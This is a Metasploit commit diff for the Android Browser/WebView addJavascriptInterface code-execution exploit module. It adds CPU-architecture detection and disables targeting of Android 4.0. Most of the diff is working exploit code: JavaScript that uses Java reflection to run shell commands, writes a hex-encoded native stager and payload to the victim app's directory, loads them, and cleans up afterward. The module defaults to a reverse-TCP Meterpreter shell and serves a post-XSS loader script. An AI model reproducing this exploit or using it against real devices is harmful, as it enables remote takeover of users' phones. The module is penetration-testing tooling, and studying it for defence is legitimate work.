Disable Android 4.0, add arch detection.

joevennix · joevennix · commit 2e4c2b1637ae · 2014-04-07T09:44:43.000-05:00
Android 4.0, it turns out, has a different echo builtin than the other androids.
Until we can figure out how to drop a payload on a 4.0 shell, we cannot support it.

Arch detection allows mips/x86/arm ndkstagers to work, unfortunately
x86 ndkstager was not working, so it is disabled for now.
diff --git a/data/js/detect/os.js b/data/js/detect/os.js
@@ -20,6 +20,7 @@ arch_armle    = "armle";
 arch_x86      = "x86";
 arch_x86_64   = "x86_64";
 arch_ppc      = "ppc";
+arch_mipsle   = "mipsle";
 
 window.os_detect = {};
 
@@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
 			} else if (platform.match(/arm/)) {
 				// Android and maemo
 				arch = arch_armle;
-				if (navigator.userAgent.match(/android/i)) {
-					os_flavor = 'Android';
-				}
+			} else if (platform.match(/x86/)) {
+				arch = arch_x86;
+			} else if (platform.match(/mips/)) {
+				arch = arch_mipsle;
+			}
+
+
+			if (navigator.userAgent.match(/android/i)) {
+				os_flavor = 'Android';
 			}
 		} else if (platform.match(/windows/)) {
 			os_name = oses_windows;
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -7,28 +7,49 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
 
-  autopwn_info({
-    :os_flavor  => "Android",
-    :arch       => ARCH_ARMLE,
+  # Since the NDK stager is used, arch detection must be performed
+  SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE ] # todo: , ARCH_X86 ]
+
+  # Most android devices are ARM
+  DEFAULT_ARCH = ARCH_ARMLE
+
+  # Some of the default NDK build targets are named differently than
+  # msf's builtin constants. This mapping allows the ndkstager file
+  # to be looked up from the msf constant.
+  NDK_FILES = {
+    ARCH_ARMLE  => 'armeabi',
+    ARCH_MIPSLE => 'mips'
+  }
+
+  autopwn_info(
+    :os_flavor  => 'Android',
     :javascript => true,
     :rank       => ExcellentRanking,
+
+    # The Android 4.0 shell is different than other versions of android
+    # in that the echo builtin does not allow the \x hex encoding syntax.
+    # Android 4.0 is still vulnerable to the Java reflection exploit, but
+    # until we find a way to drop and run the payload, we can't support
+    # it as a target.
     :vuln_test  => %Q|
-      for (i in top) {
-        try {
-          top[i].getClass().forName('java.lang.Runtime');
-          is_vuln = true; break;
-        } catch(e) {}
+      if (!navigator.userAgent.match(/Android 4\.0;/)) {
+        for (i in top) {
+          try {
+            top[i].getClass().forName('java.lang.Runtime');
+            is_vuln = true; break;
+          } catch(e) {}
+        }
       }
     |
-  })
+  )
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Android Browser and WebView addJavascriptInterface Code Execution',
-      'Description' => %q{
+      'Name'                => 'Android Browser and WebView addJavascriptInterface Code Execution',
+      'Description'         => %q{
             This module exploits a privilege escalation issue in Android < 4.2's WebView component
           that arises when untrusted Javascript code is executed by a WebView that has one or more
           Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
@@ -46,72 +67,92 @@ def initialize(info = {})
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
       },
-      'License'     => MSF_LICENSE,
-      'Author'      => [
+      'License'             => MSF_LICENSE,
+      'Author'              => [
         'jduck', # original msf module
         'joev'   # static server
       ],
-      'References'     => [
+      'References'          => [
         ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
         ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
         ['URL', 'http://50.56.33.56/blog/?p=314'],
         ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
         ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
       ],
-      'Platform'       => 'android',
-      'Arch'           => ARCH_DALVIK,
-      'DefaultOptions' => { 'PAYLOAD'  => 'android/meterpreter/reverse_tcp', },
-      'Targets'        => [ [ 'Automatic', {} ] ],
-      'DisclosureDate' => 'Dec 21 2012',
-      'DefaultTarget'  => 0,
+      'Platform'            => 'android',
+      'Arch'                => ARCH_DALVIK,
+      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+      'Targets'             => [ [ 'Automatic', {} ] ],
+      'DisclosureDate'      => 'Dec 21 2012',
+      'DefaultTarget'       => 0,
       'BrowserRequirements' => {
-        :source  => 'script',
-        :os_flavor  => "Android",
-        :arch       => ARCH_ARMLE
+        :source     => 'script',
+        :os_flavor  => 'Android'
       }
     ))
   end
 
+  # Hooked to prevent BrowserExploitServer from attempting to do JS detection
+  # on requests for the static javascript file
   def on_request_uri(cli, req)
-    if req.uri.end_with?('js')
-      print_status("Serving javascript")
-      send_response(cli, js, 'Content-type' => 'text/javascript')
+    if req.uri =~ /\.js/
+      serve_static_js(cli, req)
     else
-      print_status("Serving exploit HTML")
-      send_response_html(cli, html)
+      super
     end
   end
 
-  def ndkstager(stagename)
-    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
+  # The browser appears to be vulnerable, serve the exploit
+  def on_request_exploit(cli, req, browser)
+    arch = normalize_arch(browser[:arch])
+    print_status "Serving #{arch} exploit..."
+    send_response_html(cli, html(arch))
+  end
+
+  # The NDK stager is used to launch a hidden APK
+  def ndkstager(stagename, arch)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
     data = File.read(localfile, :mode => 'rb')
     data.gsub!('PLOAD', stagename)
   end
 
-  def js
+  def js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
-    %Q|
+    script = %Q|
       function exec(obj) {
         // ensure that the object contains a native interface
         try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
         // get the pid
-        var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null);
+        var pid = obj.getClass()
+                     .forName('android.os.Process')
+                     .getMethod('myPid', null)
+                     .invoke(null, null);
 
         // get the runtime so we can exec
-        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
-        var runtime = m.invoke(null, null);
+        var runtime = obj.getClass()
+                         .forName('java.lang.Runtime')
+                         .getMethod('getRuntime', null)
+                         .invoke(null, null);
+
+        // libraryData contains the bytes for a native shared object built via NDK
+        // which will load the "stage", which in this case is our android meterpreter stager.
+        // LibraryData is loaded via ajax later, because we have to access javascript in
+        // order to detect what arch we are running.
+        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}";
+
+        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+        // another stager which loads android meterpreter from the msf handler.
         var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
-        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
         // get the process name, which will give us our data path
         // $PPID does not seem to work on android 4.0, so we concat pids manually
         var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
         var ch, path = '/data/data/';
         while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); }
+
         var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
         var stagePath = path + '/#{stagename}.apk';
-        var dexPath = path + '/#{stagename}.dex';
 
         // build the library and chmod it
         runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
@@ -121,19 +162,80 @@ def js
         runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
         runtime.exec(['chmod', '700', stagePath]).waitFor();
 
+        // load the library (this fails in x86, figure out why)
         runtime.load(libraryPath);
+
+        // delete dropped files
         runtime.exec(['rm', stagePath]).waitFor();
         runtime.exec(['rm', libraryPath]).waitFor();
-        runtime.exec(['rm', dexPath]).waitFor();
 
         return true;
       }
 
-      for (i in top) { if (exec(top[i]) === true) break; }
+      if (!navigator.userAgent.match(/Android 4\.0;/)) {
+        for (i in top) { if (exec(top[i]) === true) break; }
+      }
     |
+
+    # remove comments and empty lines
+    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
+  end
+
+  # Called when a client requests a .js route.
+  # This is handy for post-XSS.
+  def serve_static_js(cli, req)
+    arch          = req.qstring['arch']
+    response_opts = { 'Content-type' => 'text/javascript' }
+
+    if arch.present?
+      print_status("Serving javascript for arch #{normalize_arch arch}")
+      send_response(cli, js(normalize_arch arch), response_opts)
+    else
+      print_status("Serving arch detection javascript")
+      send_response(cli, static_arch_detect_js, response_opts)
+    end
+  end
+
+  # This is served to requests for the static .js file.
+  # Because we have to use javascript to detect arch, we have 3 different
+  # versions of the static .js file (x86/mips/arm) to choose from. This
+  # small snippet of js detects the arch and requests the correct file.
+  def static_arch_detect_js
+    %Q|
+      var arches = {};
+      arches['#{ARCH_ARMLE}']  = /arm/i;
+      arches['#{ARCH_MIPSLE}'] = /mips/i;
+      arches['#{ARCH_X86}']    = /x86/i;
+
+      var arch = null;
+      for (var name in arches) {
+        if (navigator.platform.toString().match(arches[name])) {
+          arch = name;
+          break;
+        }
+      }
+
+      if (arch) {
+        // load the script with the correct arch
+        var script = document.createElement('script');
+        script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
+        script.setAttribute('type', 'text/javascript');
+
+        // ensure body is parsed and we won't be in an uninitialized state
+        setTimeout(function(){
+          var node = document.body \|\| document.head;
+          node.appendChild(script);
+        }, 100);
+      }
+    |
+  end
+
+  # @return [String] normalized client architecture
+  def normalize_arch(arch)
+    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
   end
 
-  def html
-    "<!doctype html><html><body><script>#{js}</script></body></html>"
+  def html(arch)
+    "<!doctype html><html><body><script>#{js(arch)}</script></body></html>"
   end
 end
